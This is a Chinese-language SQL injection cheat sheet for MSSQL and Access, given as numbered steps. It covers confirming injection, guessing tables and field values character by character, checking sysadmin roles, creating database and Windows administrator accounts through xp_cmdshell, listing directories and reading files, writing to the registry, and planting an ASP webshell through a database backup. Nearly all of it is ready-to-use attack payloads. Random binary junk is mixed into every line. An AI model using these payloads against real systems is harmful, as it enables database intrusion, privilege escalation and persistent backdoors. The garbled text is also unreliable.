1.判断是否有注入;and 1=1 ;and 1=2 UBve�a(z-#
2.初步判断是否是mssql ;and user>0 Q{+N�{/tF
khtY�n.eaL
3.注入参数是字符'and [查询条件] and ''=' \t�\ZyPx�n
��V.Ki$0�>
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �O��%?d0K�
W4o�$J4IX{
5.判断数据库系统 0*}%v:uN9�
)Y�@�mL/_�
;and (select count(*) from sysobjects)>0 mssql �!`?*�zf��
{%Q�&C�QG_
;and (select count(*) from msysobjects)>0 access HCTjFW>�C�
o&b�1-=MC2
cq
\()uF'c
p8a�\> {��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @��80�Z@Pj
2[R{I�V8e
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 i?�1g{J�W�
}��qOj^pkJ
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �r�k���z_h
�V�[T`I a\
9.(1)猜字段的ascii值(access) Auz.w��e�s
�p��?�,:��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 R�#UcwX}o
fd}
U����l
(2)猜字段的ascii值(mssql) |T@\�-8�Ok
^+20e3 ~Y�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��1JXa/f�+
Q]�d3a+�dK
10.测试权限结构(mssql) J}UG{Rt�tI
,�/�>hWAx
;.4A,7w�#�
((� D*kd�"
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- T,eP&I�N��
x O~�t���
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4#�^�?-�6�
\�E3�e�vU
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ow{Ss���X�
k{q4�Zz�[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �<�i(<|/�$
` kG}NJf��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- J�` �J^�C
kt�*""&��R
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- LCMCpEtY*K
�1IRl�F�C�
;and 1=(select IS_MEMBER('db_owner'));-- aOH$}Qn��S
�Eu^?�e��
{Bb:S"7NX
s]z-�d!�G
11.添加mssql和系统的帐户 �SsE8;IGH�
39�(]UO6^;
;exec master.dbo.sp_addlogin username;-- "�\9!9U#�!
;exec master.dbo.sp_password null,username,password;-- d!i#@X�Z�^
��vS{zLXg�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 8I`t`C/�4
M{ �mdh\��
;exec master.dbo.xp_cmdshell 'net user username password �QX�c�SD�J
u�'B�uZ�F
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- :"4Pr�/}rT
�c{dge/2yb
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 8(EK17rE�`
�6.!�C�m$l
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��8- U�1Y
Qw�m#6�{5
;/�Z9M"!u[
�`Y~EL?�
12.(1)遍历目录 <[e��E�5X(
�oS/cS)N20
;create table dirs(paths varchar(100), id int) N=QeeAI}}m
l12_&o"C~�
;insert dirs exec master.dbo.xp_dirtree 'c:\' y(!Y��N7_A
��P~5[.6gW
;and (select top 1 paths from dirs)>0 )Uv lEG']
�!5��;A�.f
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) je�M/8~^4-
��[�8o!X)�
t�)*MLg<C
R\B-��cU[,
(2)遍历目录 �nf7l}^/UE
eXqS9`zK�r
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- JQhw�>H9�&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 :q
xd])�-
Xo{|�m��[,
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 G�s�%� cod
q@}eYQ=P|e
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 !e}LB%z�f
.�1���[[Y}
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ;;2Yfn'�`9
dvAvG�.�;U
w�K_��I"��
"AzA|zk')"
13.mssql中的存储过程 0?tn.<'B8T
�tCJ+O�U5/
xp_regenumvalues 注册表根键, 子键 4�\.1phe$a
4nf�pPN��t
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 9b�L`0�L��
��/"B�m�1�
xp_regread 根键,子键,键值名 j}2�,|9n�e
��~ "^]\3#
;exec xp_regread *[-% �.=[7
>��>ncq$��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 lA���xbF��
�0
s�-IW��
xp_regwrite 根键,子键, 值名, 值类型, 值 r
pv�`�%
gRk%ObJGqm
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 |-�W7n'n��
t�_-1sWeA!
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �[q/tKd�o@
\Q�h�{u�k[
xp_regdeletevalue 根键,子键,值名 x�>?jf�N,e
>>�**n9\q
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 f#s
/Ycp+�
[84f[`�!Ui
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 1@j0�kTJ~m
��c�B��l
F
�o�Q!�56\R
D{]t5��0a.
14.mssql的backup创建webshell �&vf%�E@<
�+wAH?q8�f
use model v[r5!,���F
K�d?TIeF�E
create table cmd(str image); G\y:�O9��(
q��H�3|x08
insert into cmd(str) values (''); ]"jJg�O^�
r+�}5;fQ�J
backup database model to disk='c:\l.asp'; n(�|~�z���
�8�| ���6:
���yA8�e"$
r�NgFsFQ>.
15.mssql内置函数 \,�-t�]$�9
"Dc6kn^}3�
;and (select @@version)>0 获得Windows的版本号 $c�!cO"� U
%6�\�e�_y%
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �B�I��'}��
�`uO(#au,U
;and (select user_name())>0 爆当前系统的连接用户 �IA\CBwiLj
Mp�f��dl65
;and (select db_name())>0 得到当前连接的数据库 T� ~9)0A"]
��QBg~�b{h
nhfHY-l}�7
�%Ts6M,Fpp
16.简洁的webshell QEe\1�>1"&
�}=1#�ANM1
use model $�*035�f��
bZ-�"R 6a$
create table cmd(str image); #}/�Yn�Vk�
?R7>��xrp5
insert into cmd(str) values (''); �x��Q[~ c1
Zf�P�WH�'P
backup database model to disk='g:\wwwtest\l.asp';
